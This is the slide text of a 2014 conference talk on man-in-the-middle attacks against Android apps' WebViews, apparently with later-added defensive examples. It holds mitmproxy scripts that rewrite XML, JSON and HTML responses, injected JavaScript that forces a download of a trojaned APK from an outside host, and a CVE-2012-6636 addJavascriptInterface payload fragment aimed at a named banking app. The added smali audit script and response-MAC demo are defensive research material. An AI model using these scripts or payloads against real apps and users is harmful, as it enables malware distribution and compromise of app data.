MiTM Attacks in Android Apps - TDC 2014


The Developer's Conference 2014

MITM Attacks on Android Apps

Abusing the trust of developers

Ivan Joker Jeukens

Motivation

Many apps have built-in web browser capabilities (WebView, ChromeWebView, etc. classes)

HTML, JavaScript

Can we inject executable code into an app?

Advantages: we have the client code!

Obfuscation is not really known/used by most developers

Messing with the server-app communication, not about grabbing cookies etc.

Usefulness: directed attacks


Lab setup & tools

Android SDK AVD: Android 4.0.3, CPU/ABI Intel Atom

mitmproxy.org: Python scripts for manipulating requests and responses

code.google.com/p/android-apktool/: decompile into smali code

github.com/egirault/googleplay-api.git: API for interacting with the Google Play store (download apps from scripts)


MITM Script

# mitmproxy inline script (2014-era API: handlers receive ctx and flow)
from lxml import etree


def isXml(ctype):
    # helper not shown on the slide: matches text/xml, application/xml, ...+xml
    return ctype is not None and 'xml' in str(ctype).lower()


def response(ctx, flow):
    if flow.response.content is not None and isXml(flow.response.headers['Content-Type']):
        etype = flow.response.headers['Content-Encoding']  # remember gzip/identity
        flow.response.decode()                             # work on the plain bytes
        parser = etree.XMLParser(strip_cdata=False)        # keep CDATA sections intact
        root = etree.XML(flow.response.content, parser)
        ...  # modify the XML tree here
        flow.response.content = etree.tostring(root, encoding='UTF-8')
        flow.response.headers['Content-Encoding'] = etype  # restore the original encoding
        if 'gzip' in etype:
            flow.response.encode('gzip')


MITM Script (cont.)

import json
from bs4 import BeautifulSoup


# helpers not shown on the slide: cheap Content-Type checks
def isJson(ctype):
    return ctype is not None and 'json' in str(ctype).lower()


def isJavascript(ctype):
    return ctype is not None and 'javascript' in str(ctype).lower()


def isHtmlText(ctype):
    return ctype is not None and 'text/html' in str(ctype).lower()


# continuation of response(ctx, flow): the branches after the XML one
def response(ctx, flow):
    if flow.response.content is not None and (isJson(flow.response.headers['Content-Type'])
                                              or isJavascript(flow.response.headers['Content-Type'])):
        etype = flow.response.headers['Content-Encoding']
        flow.response.decode()
        jsondata = json.JSONDecoder(strict=False).decode(flow.response.content)
        ...  # modify jsondata here
        flow.response.content = json.JSONEncoder().encode(jsondata)
        flow.response.headers['Content-Encoding'] = etype
        if 'gzip' in etype:
            flow.response.encode('gzip')

    elif flow.response.content is not None and isHtmlText(flow.response.headers['Content-Type']):
        etype = flow.response.headers['Content-Encoding']
        flow.response.decode()
        htmldata = BeautifulSoup(flow.response.content)
        body = htmldata.body
        ...  # modify body here
        r = htmldata.prettify(formatter=None)
        flow.response.content = r.encode('ascii', 'ignore')
        flow.response.headers['Content-Encoding'] = etype
        if 'gzip' in etype:
            flow.response.encode('gzip')


Payload 1

Simple Social Engineering for malware distribution

Veja magazine news reader

Payload 1

.class public Lcom/matera/veja/ui/StoryDetail;

.method private createWebView()V


Payload 1

Some lame javascript

# JavaScript injected into the page, held as a Python string by the mitmproxy script
payloadveja = '''
function fase2() {
    var img = document.getElementById("chupacabra");
    img.src = "http://joker.com/vejadown.jpg";
}

function goDown() {
    var link = document.createElement("a");
    link.href = "http://joker.com/com.matera.veja.apk";
    if (document.createEvent) {
        var e = document.createEvent("MouseEvents");
        e.initEvent("click", true, true);
        link.dispatchEvent(e);
    }
    setTimeout(fase2, 3000);
}
'''


Payload 2

CVE-2012-6636 (03/02/2014): the Android API before 17 does not properly restrict the WebView.addJavascriptInterface() method

In theory, affects Android < 4.2. Versions 2.3.x don't work.

Some 3.x are also difficult.

Adobe Reader (payload fragment as shown on the slide):
    /data/data/br.com.gabba.Caixa/pwnd.txt']);

WebSettings webSettings = browser.getSettings();
webSettings.setJavaScriptEnabled(true);
browser.addJavascriptInterface(new JsInvokeClass(), "Android");


Payload 2

Android 4.2 and later: the @JavascriptInterface annotation, applied per method

My statistics on this vuln (googleplay-api for downloading the apps): the googleplay-api script downloads the 100 most popular free apps for every category.

2379 apps downloaded; 922 have addJavascriptInterface; 339 (14%) don't use @JavascriptInterface


Payload 2

.class public Lbr/com/gabba/Caixa/CaixaWebViewActivity;
.super Landroid/app/Activity;

const-string v7, "Android"
invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V

const-string v7, "HTMLOUT"
invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
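The statistic on the previous slide (apps that call addJavascriptInterface() but never use @JavascriptInterface) can be reproduced over apktool output with a small audit script. The one below is an added example for this transcript, not the speaker's googleplay-api tooling: it scans smali text for the addJavascriptInterface() call sites shown above, recovers the JavaScript-side object name from the preceding const-string, and lists methods carrying the runtime @JavascriptInterface annotation. The two sample apps (package br/com/example, classes WebActivity and JsBridge) are constructed for the demo.

```python
import re

# Patterns for the smali constructs the audit cares about.
CLASS_RE = re.compile(r"^\.class\b.*?\s(L[\w/$]+;)\s*$", re.M)
METHOD_RE = re.compile(r"^\.method\b(.*?)$(.*?)^\.end method", re.M | re.S)
INVOKE_JSI_RE = re.compile(
    r"invoke-virtual\s*\{([^}]*)\},\s*Landroid/webkit/WebView;->"
    r"addJavascriptInterface\(Ljava/lang/Object;Ljava/lang/String;\)V"
)
CONST_STRING_RE = re.compile(r'const-string\s+([vp]\d+),\s*"([^"]*)"')
# @JavascriptInterface has RUNTIME retention, so smali emits ".annotation runtime"
JSI_ANNOTATION_RE = re.compile(r"\.annotation\s+runtime\s+Landroid/webkit/JavascriptInterface;")


def audit_smali(files):
    """files: mapping of smali path -> file text (e.g. an apktool output tree).
    Returns the addJavascriptInterface() call sites with the JS-side object name,
    the methods annotated @JavascriptInterface, and an app-level verdict in the
    same spirit as the slide's statistic."""
    report = {"bridge_calls": [], "annotated_methods": []}
    for path, text in files.items():
        cls_match = CLASS_RE.search(text)
        cls = cls_match.group(1) if cls_match else path
        for signature, body in METHOD_RE.findall(text):
            method = signature.split()[-1]  # e.g. "createWebView()V"
            if JSI_ANNOTATION_RE.search(body):
                report["annotated_methods"].append((cls, method))
            last_const = {}  # register -> last string constant loaded into it
            for line in body.splitlines():
                cs = CONST_STRING_RE.search(line)
                if cs:
                    last_const[cs.group(1)] = cs.group(2)
                    continue
                inv = INVOKE_JSI_RE.search(line)
                if inv:
                    regs = [r.strip() for r in inv.group(1).split(",")]
                    # registers are {webview, object, name}; the name is the third
                    js_name = last_const.get(regs[2], "?") if len(regs) == 3 else "?"
                    report["bridge_calls"].append((cls, method, js_name))
    report["exposed_without_annotation"] = (
        bool(report["bridge_calls"]) and not report["annotated_methods"]
    )
    return report


def sample_app(annotated):
    """Constructed two-class app (hypothetical package br/com/example)."""
    annotation = (
        "    .annotation runtime Landroid/webkit/JavascriptInterface;\n"
        "    .end annotation\n" if annotated else ""
    )
    return {
        "smali/br/com/example/WebActivity.smali": (
            ".class public Lbr/com/example/WebActivity;\n"
            ".super Landroid/app/Activity;\n"
            ".method private createWebView()V\n"
            "    .locals 8\n"
            '    const-string v7, "Android"\n'
            "    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->"
            "addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V\n"
            '    const-string v7, "HTMLOUT"\n'
            "    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->"
            "addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V\n"
            "    return-void\n"
            ".end method\n"
        ),
        "smali/br/com/example/JsBridge.smali": (
            ".class public Lbr/com/example/JsBridge;\n"
            ".super Ljava/lang/Object;\n"
            ".method public showToast(Ljava/lang/String;)V\n"
            + annotation +
            "    .locals 0\n"
            "    return-void\n"
            ".end method\n"
        ),
    }


if __name__ == "__main__":
    for label, app in (("no annotation", sample_app(False)), ("annotated", sample_app(True))):
        r = audit_smali(app)
        print(label, "-> bridges:", [c[2] for c in r["bridge_calls"]],
              "annotated methods:", len(r["annotated_methods"]),
              "exposed without @JavascriptInterface:", r["exposed_without_annotation"])
```

The verdict is app-level, like the slide's count: it does not trace which object reaches which call. Two caveats when reading the output: the annotation only takes effect when the app targets API 17 or later, and on devices below 4.2 (the affected range named above) it gives no protection at all, so an annotated app can still be exposed there.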


Payload 3

Simpler: instead of injecting code, just mess with the HTML links


Feasibility

These attacks require:

Setting up the MITM within wifi range: either a rogue AP, a public probe attack, or a vulnerable SOHO router

Some recon of your target apps

Catching the requests


Conclusions

Apps normally don't validate their data

HTTPS is the only solution used to prevent these attacks
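To make the first conclusion concrete, here is what "validating the data" looks like at the point where it matters: an added example for this transcript, not code from the talk. The server attaches a MAC over the exact bytes it sends, and the client checks it over the raw body before json.loads(); the proxy_reencode() helper reproduces what the JSON branch of the MITM script does (decode, edit, re-encode) so the check can be exercised. The key, header name (X-Body-MAC) and the news-item response are all constructed for the demo.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key. It stands in for a server-side secret; because an
# attacker has the client code (see Motivation), a real app would instead
# verify an asymmetric signature so that only a public key ships in the APK.
DEMO_KEY = b"constructed-demo-key-not-for-production"


def sign_body(body, key=DEMO_KEY):
    """Server side: MAC the exact bytes that go on the wire."""
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return {
        "Content-Type": "application/json",
        "X-Body-MAC": base64.b64encode(tag).decode("ascii"),  # hypothetical header
    }


def verify_and_parse(body, headers, key=DEMO_KEY):
    """Client side: verify the MAC over the raw bytes before json.loads().
    Returns the parsed object, or raises ValueError on any mismatch."""
    tag = headers.get("X-Body-MAC")
    if tag is None:
        raise ValueError("response carries no body MAC")
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, base64.b64decode(tag)):
        raise ValueError("body MAC mismatch: response was modified in transit")
    return json.loads(body)


def proxy_reencode(body, changes):
    """Model of the slides' JSON branch: decode, edit, re-encode.
    Used here only to produce inputs for the verifier above."""
    data = json.JSONDecoder(strict=False).decode(body.decode("utf-8"))
    data.update(changes)
    return json.JSONEncoder().encode(data).encode("utf-8")


def is_accepted(body, headers):
    """True if the client would act on this response, False if it rejects it."""
    try:
        verify_and_parse(body, headers)
        return True
    except ValueError:
        return False


# Constructed sample response: a news item whose link the app opens in a WebView.
ORIGINAL = b'{"title":"Headline","url":"https://news.example.invalid/story/1"}'
HEADERS = sign_body(ORIGINAL)

if __name__ == "__main__":
    print("untouched:", is_accepted(ORIGINAL, HEADERS))
    swapped = proxy_reencode(ORIGINAL, {"url": "http://untrusted.example.invalid/app.apk"})
    print("link swapped:", is_accepted(swapped, HEADERS))
    print("re-serialised, no edits:", is_accepted(proxy_reencode(ORIGINAL, {}), HEADERS))
```

Note the third case: the proxy's re-encoding step changes whitespace even when nothing was edited, so a check over the raw bytes rejects any response that passed through such a script, not only the ones with a swapped link. That is the point of verifying the bytes rather than a re-parsed object.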


Thanks for watching

[email protected]

ivanjokerbr.github.io

github.com/ivanjokerbr/

www.slideshare.net/ivanjokerbr